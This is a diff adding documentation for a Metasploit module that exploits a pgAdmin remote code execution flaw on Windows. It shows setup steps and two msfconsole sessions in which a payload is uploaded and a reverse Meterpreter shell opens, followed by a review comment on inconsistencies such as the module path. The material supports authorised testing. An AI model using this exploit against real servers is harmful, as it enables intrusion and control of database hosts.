| 1 | +*## Vulnerable Application |
| 2 | +The pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) flaw through the validate binary path API. This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant threat to the integrity of the database management system and the security of its underlying data. |
| 3 | + |
| 4 | +The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available, Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint. |
| 5 | + |
| 6 | +## Verification Steps |
| 7 | + |
| 8 | +1. Install the application |
| 9 | +1. Start msfconsole |
| 10 | +1. Do: `use exploit/multi/http/pgadmin_binary_path_api` |
| 11 | +1. Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options |
| 12 | +1. Do: `run` |
| 13 | + |
| 14 | + |
| 15 | +### Installation (Windows) |
| 16 | + |
| 17 | +These steps are the bare minimum to get the application to run for testing and should not be use for a production setup. |
| 18 | +For a production setup, a server like Apache should be setup to run pgAdmin through it's WSGI interface. |
| 19 | + |
| 20 | +**The following paths are all relative to the default installation path `C:\Program Files\pgAdmin 4\web`**. |
| 21 | + |
| 22 | +1. [Download][1] and install the Windows build |
| 23 | +1. Copy the `config_distro.py` file to `config_local.py` |
| 24 | +1. Edit `config_local.py` and set `SERVER_MODE` to `True` |
| 25 | +1. Initialize the database: `..\python\python.exe setup.py setup-db` |
| 26 | +1. Create an initial user account: `..\python\python.exe setup.py add-user --admin [email protected] 123456` |
| 27 | +1. Run the application: `..\python\python.exe pgAdmin4.py` |
| 28 | + |
| 29 | +## Scenarios |
| 30 | +Specific demo of using the module that might be useful in a real world scenario. |
| 31 | + |
| 32 | +### pgAdmin 8.4 on Windows (Authenticated) |
| 33 | + |
| 34 | +``` |
| 35 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.5 |
| 36 | +RHOSTS => 192.168.1.5 |
| 37 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set USERNAME [email protected] |
| 38 | + |
| 39 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set PASSWORD 123456 |
| 40 | +PASSWORD => 123456 |
| 41 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 |
| 42 | +LHOST => 192.168.1.6 |
| 43 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit |
| 44 | +
|
| 45 | +[*] Started reverse TCP handler on 192.168.1.6:4444 |
| 46 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 47 | +[+] The target is vulnerable. pgAdmin version 8.4.0 is affected |
| 48 | +[*] Successfully authenticated to pgAdmin |
| 49 | +[*] Payload uploaded to: C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe |
| 50 | +[*] Sending stage (201798 bytes) to 192.168.1.5 |
| 51 | +[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.5:52588) at 2024-08-26 19:48:10 +0200 |
| 52 | +[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe' on the target |
| 53 | +
|
| 54 | +meterpreter > sysinfo |
| 55 | +Computer : DESKTOP-FMNV75N |
| 56 | +OS : Windows 10 (10.0 Build 19045). |
| 57 | +Architecture : x64 |
| 58 | +System Language : en_US |
| 59 | +Domain : WORKGROUP |
| 60 | +Logged On Users : 2 |
| 61 | +Meterpreter : x64/windows |
| 62 | +meterpreter > |
| 63 | +
|
| 64 | +``` |
| 65 | + |
| 66 | +### pgAdmin 8.4 on Windows (Unauthenticated) |
| 67 | + |
| 68 | +``` |
| 69 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.7 |
| 70 | +RHOSTS => 192.168.1.7 |
| 71 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 |
| 72 | +LHOST => 192.168.1.6 |
| 73 | +msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit |
| 74 | +
|
| 75 | +[*] Started reverse TCP handler on 192.168.1.6:4444 |
| 76 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 77 | +[+] The target is vulnerable. pgAdmin version 8.4.0 is affected |
| 78 | +[*] Payload uploaded to: C:\Users\pgAdmin\pg_restore.exe |
| 79 | +[*] Sending stage (200774 bytes) to 192.168.1.7 |
| 80 | +[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.7:55560) at 2024-08-26 19:51:01 +0200 |
| 81 | +[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\pg_restore.exe' on the target |
| 82 | +
|
| 83 | +meterpreter > sysinfo |
| 84 | +Computer : DESKTOP-HTGS43E |
| 85 | +OS : Windows 10 (10.0 Build 22000). |
| 86 | +Architecture : x64 |
| 87 | +System Language : en_GB |
| 88 | +Domain : WORKGROUP |
| 89 | +Logged On Users : 1 |
| 90 | +Meterpreter : x64/windows |
| 91 | +meterpreter > |
| 92 | +
|
| 93 | +``` |
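Review bot: the module path in Verification Steps, `use exploit/multi/http/pgadmin_binary_path_api`, does not match the prompt shown in both Scenarios, `msf6 exploit(windows/http/pgadmin_binary_path_api) >`; since the text itself says the vulnerability is specific to Windows targets, `windows/http/` looks like the intended location, so the `use` line should be corrected to match. In the same list, step 4 names `RHOST` while both sessions set `RHOSTS`; use `RHOSTS` there. The authenticated transcript is also missing the `USERNAME =>` echo that msfconsole prints after `set USERNAME` (there is a blank line where it would appear), so the output looks hand-edited or truncated; please paste the console output as captured. The cleanup path in that run, `storage\test_test.com/pg_restore.exe`, mixes `\` and `/`; if that string is produced by the module, the cleanup message should normalise separators so the path can be copied as printed. Wording fixes in the Installation section: "should not be use for a production setup" should read "used", "a server like Apache should be setup" should read "set up", and "it's WSGI interface" should read "its". The first line, `*## Vulnerable Application`, carries a stray `*` that will render as a literal asterisk before the heading. Lastly, the sentence "This vulnerability is specific to Windows targets." sits in the middle of the paragraph about the authenticated scenario; moving it into the first paragraph, next to the affected-version statement, would make the scope clear before the exploitation modes are described.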